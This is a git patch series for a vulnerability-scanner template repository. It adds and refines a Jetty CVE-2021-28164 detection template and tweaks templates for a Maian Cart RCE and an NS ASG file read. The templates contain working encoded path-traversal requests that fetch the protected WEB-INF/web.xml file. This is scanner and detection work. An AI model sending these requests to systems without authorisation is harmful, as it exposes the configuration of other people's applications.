From 1e0a542b2149d5eeaf51784fa06a685dc9270d7d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:07:03 +0300 Subject: [PATCH 01/11] New test --- ...g-information-disclosure-vulnerability.yml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml new file mode 100644 index 0000000000..13374fad92 --- /dev/null +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml @@ -0,0 +1,38 @@ +id: jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability + +info: + name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability + author: noamrathaus + severity: high + reference: | + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + description: | + Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. + + This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + + Impact + This affects all versions of ConcatServlet and WelcomeFilter in versions before 9.4.41, 10.0.3 and 11.0.3. + + Workarounds + If you cannot update to the latest version of Jetty, you can instead deploy your own version of the ConcatServlet and/or the WelcomeFilter by using the code from the latest version of Jetty. + tags: jetty + +requests: + - method: GET + path: + - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "/weaver/" + part: body + - type: word + part: header + words: + - "application/xml" From 27db48cb532b30fce2f919c2d44469e57d1f9204 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:42:41 +0300 Subject: [PATCH 02/11] Another vector --- ...vlet-double-decoding-information-disclosure-vulnerability.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml index 13374fad92..fcaa5e2d31 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml @@ -22,6 +22,7 @@ requests: - method: GET path: - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" + - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" matchers-condition: and matchers: From 46e4d47d9231776e747a21a510e933c4ebb14e9c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:43:04 +0300 Subject: [PATCH 03/11] Another reference --- ...vlet-double-decoding-information-disclosure-vulnerability.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml index fcaa5e2d31..cb7e67f6c3 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml @@ -6,6 +6,7 @@ info: severity: high reference: | - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. From 23cb4c4d9f81760ef03c48cc4e18c7b6b60c2b5a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:37:40 +0530 Subject: [PATCH 04/11] moving files around --- .../2021/CVE-2021-28164.yml | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) rename vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml => cves/2021/CVE-2021-28164.yml (74%) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/cves/2021/CVE-2021-28164.yml similarity index 74% rename from vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml rename to cves/2021/CVE-2021-28164.yml index cb7e67f6c3..db107faa80 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -1,4 +1,4 @@ -id: jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability +id: CVE-2021-28164 info: name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability @@ -9,15 +9,8 @@ info: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. - This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. - - Impact - This affects all versions of ConcatServlet and WelcomeFilter in versions before 9.4.41, 10.0.3 and 11.0.3. - - Workarounds - If you cannot update to the latest version of Jetty, you can instead deploy your own version of the ConcatServlet and/or the WelcomeFilter by using the code from the latest version of Jetty. - tags: jetty + tags: cve,cve2021,jetty requests: - method: GET @@ -34,7 +27,8 @@ requests: words: - "/weaver/" part: body + - type: word part: header words: - - "application/xml" + - "application/xml" \ No newline at end of file From eef515820705d623b35fd28ab239727e6c20e4a2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:38:12 +0530 Subject: [PATCH 05/11] Update CVE-2021-28164.yml --- cves/2021/CVE-2021-28164.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yml index db107faa80..975bab47cf 100644 --- a/cves/2021/CVE-2021-28164.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -4,12 +4,12 @@ info: name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability author: noamrathaus severity: high - reference: | - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + reference: | + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 tags: cve,cve2021,jetty requests: From 1299ae621fd719b162c769226d5cd09ee948de87 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:39:19 +0530 Subject: [PATCH 06/11] Update CVE-2021-28164.yml --- cves/2021/CVE-2021-28164.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yml index 975bab47cf..6c5d5c88ba 100644 --- a/cves/2021/CVE-2021-28164.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -1,7 +1,7 @@ id: CVE-2021-28164 info: - name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability + name: Authorization Before Parsing and Canonicalization in jetty author: noamrathaus severity: high description: | From ccdb667d3bf392a482f9bed151a0dde9ade601a2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:42:14 +0530 Subject: [PATCH 07/11] YML to YAML --- cves/2021/{CVE-2021-28164.yml => CVE-2021-28164.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2021/{CVE-2021-28164.yml => CVE-2021-28164.yaml} (100%) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yaml similarity index 100% rename from cves/2021/CVE-2021-28164.yml rename to cves/2021/CVE-2021-28164.yaml From feb42e49b092f111193fb02e69587abe4f66c623 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 13 Jun 2021 09:53:47 +0300 Subject: [PATCH 08/11] Reduce chances of FP --- vulnerabilities/other/maian-cart-preauth-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index 6888e6a4f2..3290e2d7fd 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -55,4 +55,5 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr_1}}")' \ No newline at end of file + - 'contains(body_3, "{{randstr_1}}")' + - "status_code_3 == 200" \ No newline at end of file From 3369c5a4dd5a6bf63036b09cf8a22a5187568e92 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 13 Jun 2021 11:55:20 +0300 Subject: [PATCH 09/11] Reference --- vulnerabilities/other/ns-asg-file-read.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 66e112d2de..2f34341723 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -4,6 +4,7 @@ info: name: NS ASG Arbitrary File Read author: pikpikcu severity: high + reference: https://zhuanlan.zhihu.com/p/368054963 tags: nsasg,lfi requests: From 809668943f3d9283fa0f6c609f068195eea3a2d3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 23:54:29 +0530 Subject: [PATCH 10/11] minor changes --- cves/2021/CVE-2021-28164.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 6c5d5c88ba..8a507e6cbd 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -1,31 +1,31 @@ id: CVE-2021-28164 info: - name: Authorization Before Parsing and Canonicalization in jetty + name: Jetty Authorization Before Parsing and Canonicalization author: noamrathaus severity: high description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. reference: | - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 + - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty requests: - method: GET path: - - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" - - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" + - "{{BaseURL}}/%2e/WEB-INF/web.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "/weaver/" + - "" part: body - type: word From a9a161f8c62f0467a03e030bc2fd00fb8ccc7d58 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 23:56:33 +0530 Subject: [PATCH 11/11] Update CVE-2021-28164.yaml --- cves/2021/CVE-2021-28164.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 8a507e6cbd..a12313586b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -5,8 +5,7 @@ info: author: noamrathaus severity: high description: | - Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. - This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. reference: | - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty